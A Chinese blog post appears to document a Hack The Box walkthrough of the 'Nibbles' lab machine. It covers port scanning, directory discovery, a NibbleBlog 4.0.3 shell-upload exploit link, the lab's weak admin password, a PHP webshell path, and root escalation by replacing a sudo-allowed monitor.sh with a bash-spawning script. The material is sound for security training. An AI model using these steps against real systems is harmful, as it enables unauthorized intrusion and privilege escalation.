【Hack The Box】linux练习-- Nibbles

最新推荐文章于 2024-10-15 17:46:09 发布
最新推荐文章于 2024-10-15 17:46:09 发布
阅读量257 收藏
点赞数
分类专栏: Hack The Box 文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127756896
版权

HTB 学习笔记

【Hack The Box】linux练习-- Nibbles

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)

发现只有一个80。习惯性看一眼源码
在这里插入图片描述去了页面看了发现可能是个cms
搜索一下

在这里插入图片描述
在这里插入图片描述但是不知道版本信息,接下来需要爆破目录,看能不能找到本本信息

因为是apache,所以我们应该额外关注php,txt也是需要关注的
在这里插入图片描述有价值的爆破结果如下

/content              
/admin                (Status: 301) [Size: 323] [--> http://10.129.96.84/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
README

在这里插入图片描述
EXP在下面

https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html

在这里插入图片描述
然后在admin.php发现了登陆页面

在这里插入图片描述
最后尝试出来账号密码是弱口令

admin/nibbles

在这里插入图片描述然后上传一个php,刚在如果你认真的翻了admin和content两个目录,你就会发现plugins的目录

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

在这里插入图片描述

提权

在这里插入图片描述

sudo -l
看到是一个sh文件,碰到这种情况,我们要么在原有文件中修改,增加一个反弹shell,要么直接给源文件全部删除,然后自己写一个bash全覆盖,我们这里采取第二种方法

我们去到这个目录,发现没有这么个文件,直接自己写一个

vi monitor.sh
#!/bin/sh
bash

chmod +x monitor.sh

sudo ./monitor.sh

在这里插入图片描述

人间体佐菲
关注
专栏目录
靶机渗透_hackthebox__Writeup -6
qq_34717555的博客
11-11 1213
host:10.10.10.138 nmap 扫描一下 这次也尝试了一下自己的选项和A 选项发现A 比自己设置的要好很多不过这样被发现的几率也大了一些 自己配置的可以有很多降低被发现的选项 # Nmap 7.70 scan initiated Tue Aug 6 20:47:35 2019 as: nmap -A -o nmap.scan 10. 10.10.138 Nmap scan ...
HackTheBox-nibbles渗透测试
weixin_43111940的博客
04-20 241
端口 sudo nmap -sC -sV -A -p 22,80 10.10.10.75 访问80端口,提示了一个目录 访问 扫描目录 发现admin.php和readme 找到了版本号 搜到了对应的漏洞 https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html 尝试登录一下admin.php,密码就是靶机的名称(惊不惊喜,这脑洞谁能想到) 找到漏洞发生的文件上传的点 上传shell 找
HackTheBox-Machines--Nibbles
七天
05-30 455
Nibbles 测试过程。
HackTheBox-LPE-Nibbles #Linux
weixin_39974634的博客
12-15 881
这是是一个命令,它的作用是在Unix或类Unix系统中以root用户的身份执行名为 monitor.sh 的shell脚本。sudo 是超级用户(Super User)做的缩写,它允许普通用户暂时获得root权限来执行需要更高权限的任务。./monitor.sh 是指当前目录下的名为 monitor.sh 的shell脚本。-u root 表示指定要使用的用户为root,也就是系统的超级用户。参数是用来指定切换到哪个用户身份来执行后续的命令。参数一起使用时,后面的值应该是你要模拟的用户的用户名。
No.123-HackTheBox-Linux-Nibbles-Walkthrough渗透学习
qq_34801745的博客
06-04 327
** HackTheBox-Linux-Nibbles-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/121 靶机难度:初级(2.9/10) 靶机发布日期:2018年6月30日 靶机描述: Nibbles is a fairly simple machine, however with the inclusion of a login blacklist, it is a fair bit more challengi
HackTheBox - Nibbles Write Up
ak.Gh0st的博客
04-01 316
HackTheBox - Nibbles - Write Up
Nibbles - Hack the box
neal1991的专栏
03-17 507
IntroductionTarget: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44Information Enumera...
hackthebox-Nibbles(考点:nibbles安全&上传/linux修改脚本)
冬萍子癸水
04-11 514
nmap 点开80,太简洁 dirbuster扫一扫,扫不出什么, 没什么信息,只能继续信息搜集,ctrl+u,看到这个 ok这是个nibbles博客,查一查就知道是个博客系统。提示了这个新目录 重现拿dirbuster扫这个新目录。发现登陆页面 没有账号密码信息,暴力破解之前,要先猜弱口令。因为有nibble,所以和admin这些混合起来猜。 还好不难,admin+nibbles 进入到...
Linux Nibbles-开源
04-27
Linux Nibbles 开源详解】 Linux Nibbles是一款开源的游戏软件,它的设计灵感来源于经典的“蛇”游戏,但在此基础上进行了创新。游戏的核心玩法是操控一条在屏幕上移动的蛇,避开各种障碍物以获取分数。与传统的...
ai-nibbles-server:AI-Nibbles 编程游戏的服务器(Q-Basic Nibbles 克隆)
06-13
cd ai-nibbles-server npm install 如果您收到 MSBUILD 错误,请不要介意。 socket.io 有一个可选的本机编译步骤,它需要在 Windows 上安装 Visual Studio,但没有它也能正常工作。 跑步 运行服务器: npm start ...
NGE_Nibbles-开源
04-26
NGE_NibblesNibbles(旧的街机游戏)的克隆。 NGE_Nibbles使用DJGPP编译器以C ++进行编码,并且可以在DOS和Windows 9x下运行。 您可以使用内部脚本语言和sprites / fonts抓取器快速添加关卡和美术。
Linux 命令:每日一学,一文说尽打包压缩工具实践
WeiyiGeek 唯一极客IT知识分享
10-12 761
[知识是人生的灯塔,只有不断学习,才能照亮前行的道路]文章目录:0x00 前言简述前面,我们介绍了Linux中文件查找find命令以及与之联用最勤的xargs命令,作者以一个个简单的实例给各位看友展示了在运维中两个命令的使用技巧,今天我们再来介绍一些打包、压缩解压等相关命令。在 Linux 系统中,我们经常需要使用到压缩和解压文件,使用压缩文件可以减少文件大小,从而减少存储空间,以及在网络传输...
Linux从小白到高手》综合应用篇:详解Linux系统调优之内存优化
qq_45732829的博客
10-11 1007
内存是影响Linux性能的主要因素之一,内存资源的充足与否直接影响应用系统的使用性能。内存调优的主要目标是合理分配和利用内存资源,减少内存浪费,提高内存利用率,从而提升系统整体性能。
Linux】解读信号的本质&相关函数及指令的介绍
YYDsis的博客
10-14 724
一.信号的本质与相关概念1.体现中断的例子:.系统定义的信号列表1.用kill -l命令可以察看系统定义的信号列表2.(ps&kill&raise&abort)进程指令&信号相关函数【总结】【1】ps指令【2】kill&raise函数介绍与演示【3】abort函数介绍与演示三.产生信号的四种方式1.通过终端按键产生信号(Core Dump)2.调用系统函数向进程发信号3.由软件条件产生信号4.硬件异常产生信号
linux----相对和绝对以及特殊路径
fuvuof的博客
10-11 253
绝对路径:以根目录为起点,在cd命令中的格式为:cd /##/##/目标目录。#相对路径:以当前目录为起点,在cd命令中的格式为:cd ##/##/目标目录。
Linux】ioctl分析
目标:MVP
10-14 1043
一个字符设备驱动通常会实现常规的openreleaseread和write接口,但是如果需要扩展新的功能,通常以ioctl接口的方式实现。fill:#333;user spacevfsdriverioctl()ulocked_ioctl()或compat_ioctl()user spacevfsdriver。
Linux动静态库
2301_76197086的博客
10-13 1051
详解Linux系统中的动静态库生成和使用,以及可执行程序运行时与动态库进行动态链接的原理
linux升级cmake
最新发布
James
10-15 337
可以下载各个版本的cmake: https://cmake.org/files/进入https://cmake.org/files/v3.12/选择cmake-3.12.4.tar.gz。如果出现如下报错,就应该升级cmake了!2.解压后进入文件夹进行编译编译。打印如下,说明安装成功了!
Linux 内核清理缓存命令
luoye_369的博客
10-11 361
一、问题描述log:
Cut down on kitchen clutter with our double-sided serving tray! Designed to be multi-purpose, the opposite side is flat and perfect for serving charcuterie, appetizers, desserts, or other nibbles, whether for a party, or a regular afternoon snack. 更好的描述下
05-16
我们的双面托盘可以帮助您减少厨房杂物!它的设计是多功能的,另一面是平的,非常适合用于盛放肉肠、开胃菜、甜点或其他小吃,无论是为了聚会还是普通的下午茶都非常合适。这款托盘的双面设计不仅增加了它的实用性,而且还使它更加美观,您可以根据需要选择使用哪一面。它是由高品质的材料制成,耐用且易于清洁。购买一件这样的托盘,您将拥有一款实用、美观、耐用的厨房工具,让您的生活更加便捷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值